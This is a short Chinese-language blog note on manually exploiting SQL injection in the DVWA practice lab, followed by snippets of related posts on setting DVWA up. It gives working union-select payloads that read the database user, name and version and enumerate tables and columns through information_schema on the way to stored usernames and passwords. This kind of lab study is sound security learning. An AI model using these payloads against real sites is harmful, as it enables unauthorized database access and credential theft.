首先還是手工檢測注入點單引號在id=1後面 報錯有可能為注入點 然後為了保險就再用and 1=1頁面正常 and 1=2 頁面錯誤 ,說明存在注入點的
集訓構造union select語句,來查詢正在使用中的使用者user()、 資料庫database()、資料庫版本version()、伺服器作業系統@@version_compile_os,用以下語句;union select user(),database()+–+查詢**使用者名稱和密碼 mysql5.0以 上,information_schema儲存所有資料庫下的表名和列名資訊,例如查詢 information_schema資料庫名下的表名tables的資訊(條件;tables_schema=0x64767761資料名為dvwa)
information_schema .tables:infoemation_schema資料庫名下表名tables記錄所有資料庫名下的所有標明資訊的表
例子 http://www.*.com:880/dvwa/vulnerabilities/sqli/?id=1』union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761+–+
例子 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273+–+注意0x7573657273為user的16進製制值
好了 本人手工注入也是菜 只是發表出來讓自己記著是怎麼做的
2003搭建DVWA測試環境
搭建dvwa測試環境 在這裡分享給大家乙個可以使用的dvwa漢化版原始碼 源目錄的config資料夾下有個config.inc.php檔案。右鍵 開啟方式 記事本,我這裡用notepad 開啟。資料庫的配置如下 然後在phpstudy中開啟apache,mysql服務。開啟瀏覽器,在位址列中輸入 若...
DVWA環境搭建
萌新入坑之路,dvwa環境搭建,大家可能都很好奇,dvwa是什麼?為什麼大多的安全從業人員都是喜歡它 個人覺得它香了 對於挖不到src的萌新來說,玩它最有成就感!1 進入命令提示符介面,利用ipconfig命令查詢本機ip位址,用瀏覽器訪問 2 也可以用瀏覽器訪問 3 還可以用瀏覽器訪問http l...
DVWA漏洞環境搭建
1.進入mysql管理中點選phpmyadmin或在瀏覽器中開啟建立名為 dvwa 的資料庫,點選建立。2.在www目錄中的dvwa config資料夾下的config.inc.php中修改使用者名稱 密碼 資料庫名以及埠。修改完成後開啟瀏覽器訪問登陸。預設賬號 admin 密碼 password。...